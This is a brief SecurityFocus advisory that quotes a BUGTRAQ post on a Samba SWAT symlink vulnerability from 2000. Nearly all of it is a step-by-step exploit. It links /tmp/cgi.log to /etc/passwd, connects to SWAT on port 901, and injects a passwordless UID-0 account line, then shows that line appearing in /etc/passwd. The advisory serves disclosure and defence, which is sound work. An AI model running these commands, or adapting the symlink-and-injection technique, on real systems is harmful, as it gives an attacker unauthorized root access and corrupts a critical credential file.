SAMBA SWAT Symlink Vulnerability

From the BUGTRAQ post on this issue (included in full in the 'Credit' section):


ln -s /tmp/cgi.log /etc/passwd

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash


 

Privacy Statement
Copyright 2010, SecurityFocus